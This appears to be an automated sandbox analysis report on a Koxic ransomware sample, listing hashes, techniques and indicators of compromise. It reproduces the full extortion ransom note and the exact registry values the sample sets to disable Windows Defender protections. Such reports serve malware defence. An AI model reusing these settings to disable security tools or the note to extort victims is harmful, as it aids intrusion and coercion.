koxic | d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333

Resubmissions

11-10-2022 07:47

221011-jmlcracher 10

11-10-2022 07:35

221011-jeym4sccd3 10

Analysis

max time kernel
101s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
11-10-2022 07:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Size

158KB
MD5

3c4fa896e819cb8fada88a6fdd7b2cc7
SHA1

0ebf10867534cb472bb98344f80e3a8aac0aa507
SHA256

d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333
SHA512

e4486c33fc7bf99700fabec50ead10a6159758603d50eabe650436098a977b8c9dc728d0e8dbc3e3718393a7ba67cca8ea2799ef83e9194f178f04ae9784473e
SSDEEP

3072:Wkb6bwPcmQ1mbTw8Gt189VTG079sTGyAzbnuvXdIR:WkTPcmscw/1ETGgWGy0uvC

Score

10^/10

koxic evasion ransomware trojan

Malware Config

Extracted

Path

C:\Documents and Settings\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt

Ransom Note

--=== Hello ===--- [+] Whats Happen? [+] Your sensitive information and data were downloaded. Your files are encrypted, and currently unavailable just so you can contact us faster. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] We are not interested in distributing information, we are interested in agreeing with you - these are your guarantees. Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should send sample to us to decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise-time is much more valuable than money. [+] How to contact us? [+] Just write us an email to [email protected] [+] Consequences if we do not find a common language [+] 1. The data were irretrievably lost. 2. Leaked data will be published or sold on blmarket (or to competitors). 3. In some cases, DDOS attacks will be applied to your inftastructure. !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! Your UserID: 5941D3D8DD33374CE6004B7293851038BAD9260444569309ADD26773B61BE8919085F4208BCB468902 6C14CAC7D4F2A150F374599D1552294515082733BB8DA3D71494BDB2C6AF74A674A2B5B023D0D4AB31 F2F18B081C5CA04D295D8BDF8915D42091A49381DF98DE480C664AEFE1E8DC3B95525FE4E377843509 6AA7B869ABE01C265C3226543C760B52FA8197997EBDB565A45AE35C9DC0F8574E63F7428BFEBC55CC EC01DBBA7329FF698EF9C4BAC97049287BA4FB3CBD70BE9F0CAD7D30B759C897EECDB03955CEA35B32 AF388DDB2B5A6ADC4D9F3A69257EF7BFE296B16D96137BCCA23CE5CC14AA6095DE06DCB998E13FB9A5 FB64E752597B31DCF5FC3082010A0282010100A287A2E444874D141E618E6325F12B6B245C12847BBB ABE7ED654433E0E6D136F04059B0CC4ECA8EA6792223C5BC47ABC4C8573E568728CE82107C7D6DFE38 1581D736FD4048670BF2333BACDC7A22B4E7F10B02078CFFAF4032FA6B8E61B63F12D0DEB8800D4C68 5ADEB358B05E6BF525D2AC2729EFF4328E7EC9EE5B758EEF7AE3161DA003F0C40208810A69994111E9 D51AA999055427336CDD063D0BC835A10AC33222F8368C8B1654CF204E38C04D4746305FA09C574C81 A9BA2CB976F4C17858403A763178FD25B1E296AADAF151874580C29AD56B97316444824008BC393CC4 44692E2D48F815AEBCDDD6E1F868F5FFF35A70731B9DA1A6271B6BE7F502030100012183D6457303B1 EA53614B9CE7E16089555646524D

Emails

[email protected]

Signatures

Koxic
A C++ written ransomware first seen in late 2021.
ransomware koxic

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe

Disables taskbar notifications via registry modification
evasion

Modifies extensions of user files 14 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\InitializeSkip.crw => C:\Users\Admin\Pictures\InitializeSkip.crw.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\InstallPing.tiff.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\ResizeCopy.crw => C:\Users\Admin\Pictures\ResizeCopy.crw.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\MeasureInstall.crw.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\ConvertLock.tif => C:\Users\Admin\Pictures\ConvertLock.tif.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\CompleteWrite.png => C:\Users\Admin\Pictures\CompleteWrite.png.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\CompleteWrite.png.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\ResizeCopy.crw.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\MeasureInstall.crw => C:\Users\Admin\Pictures\MeasureInstall.crw.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\InstallPing.tiff => C:\Users\Admin\Pictures\InstallPing.tiff.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\InitializeSkip.crw.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\ConvertLock.tif.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\OptimizeShow.png => C:\Users\Admin\Pictures\OptimizeShow.png.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\OptimizeShow.png.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe

Windows security modification 2 TTPs 8 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration\NotificationSuppress = "1"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtectione = "0"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\DisableBlockAtFirstSeen = "1"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\LocalSettingOverrideSpynetReporting = "0"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "2"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe

Drops file in Program Files directory 64 IoCs

Processes:

d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pt-br\ui-strings.js.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\Example2.Diagnostics\1.0.1\Example2.Diagnostics.psd1.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Retail-ppd.xrm-ms.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\System\ole db\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\es-MX\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019VL_KMS_Client_AE-ul.xrm-ms.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\sound.properties.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview.svg.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pt-br\ui-strings.js.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fr-CA\tipresx.dll.mui.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare_f_col.hxk.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\Mozilla Firefox\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\PREVIEW.GIF.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nb.txt.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\Windows Media Player\Media Renderer\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldBeLessThan.snippets.ps1xml.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\TURABIAN.XSL.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\ui-strings.js.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ro-ro\ui-strings.js.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ppd.xrm-ms.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\de-DE\tipresx.dll.mui.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\Microsoft Office\root\vfs\System\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp-ul-phn.xrm-ms.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_x64__8wekyb3d8bbwe\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil.png.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Organic.thmx.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\tr-TR\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\Example3.Diagnostics\1.1.1\Diagnostics\Simple\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\ui-strings.js.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\help.svg.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription5-pl.xrm-ms.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right-pressed.gif.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\ui-strings.js.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\InModuleScope.Tests.ps1.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\Example1.Diagnostics\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-140.png.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProXC2RVL_MAKC2R-ul-oob.xrm-ms.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA6\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\WindowsApps\Microsoft.Services.Store.Engagement_10.0.18101.0_x64__8wekyb3d8bbwe\AppxMetadata\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\BLUECALM.INF.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up.gif.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pl.jar.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_OEM_Perp-ul-phn.xrm-ms.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\WordR_Retail-pl.xrm-ms.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\ATPVBAEN.XLAM.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css.KOXIC_UVFRM	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

1988 ipconfig.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2972 taskkill.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

3584 notepad.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2612 PING.EXE

pid	process
1988	ipconfig.exe

pid	process
2972	taskkill.exe

pid	process
3584	notepad.exe

pid	process
2612	PING.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exed2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2972	taskkill.exe
Token: SeBackupPrivilege	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Token: SeRestorePrivilege	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Token: SeManageVolumePrivilege	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Token: SeTakeOwnershipPrivilege	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Token: SeIncreaseQuotaPrivilege	308	WMIC.exe
Token: SeSecurityPrivilege	308	WMIC.exe
Token: SeTakeOwnershipPrivilege	308	WMIC.exe
Token: SeLoadDriverPrivilege	308	WMIC.exe
Token: SeSystemProfilePrivilege	308	WMIC.exe
Token: SeSystemtimePrivilege	308	WMIC.exe
Token: SeProfSingleProcessPrivilege	308	WMIC.exe
Token: SeIncBasePriorityPrivilege	308	WMIC.exe
Token: SeCreatePagefilePrivilege	308	WMIC.exe
Token: SeBackupPrivilege	308	WMIC.exe
Token: SeRestorePrivilege	308	WMIC.exe
Token: SeShutdownPrivilege	308	WMIC.exe
Token: SeDebugPrivilege	308	WMIC.exe
Token: SeSystemEnvironmentPrivilege	308	WMIC.exe
Token: SeRemoteShutdownPrivilege	308	WMIC.exe
Token: SeUndockPrivilege	308	WMIC.exe
Token: SeManageVolumePrivilege	308	WMIC.exe
Token: 33	308	WMIC.exe
Token: 34	308	WMIC.exe
Token: 35	308	WMIC.exe
Token: 36	308	WMIC.exe
Token: SeIncreaseQuotaPrivilege	308	WMIC.exe
Token: SeSecurityPrivilege	308	WMIC.exe
Token: SeTakeOwnershipPrivilege	308	WMIC.exe
Token: SeLoadDriverPrivilege	308	WMIC.exe
Token: SeSystemProfilePrivilege	308	WMIC.exe
Token: SeSystemtimePrivilege	308	WMIC.exe
Token: SeProfSingleProcessPrivilege	308	WMIC.exe
Token: SeIncBasePriorityPrivilege	308	WMIC.exe
Token: SeCreatePagefilePrivilege	308	WMIC.exe
Token: SeBackupPrivilege	308	WMIC.exe
Token: SeRestorePrivilege	308	WMIC.exe
Token: SeShutdownPrivilege	308	WMIC.exe
Token: SeDebugPrivilege	308	WMIC.exe
Token: SeSystemEnvironmentPrivilege	308	WMIC.exe
Token: SeRemoteShutdownPrivilege	308	WMIC.exe
Token: SeUndockPrivilege	308	WMIC.exe
Token: SeManageVolumePrivilege	308	WMIC.exe
Token: 33	308	WMIC.exe
Token: 34	308	WMIC.exe
Token: 35	308	WMIC.exe
Token: 36	308	WMIC.exe
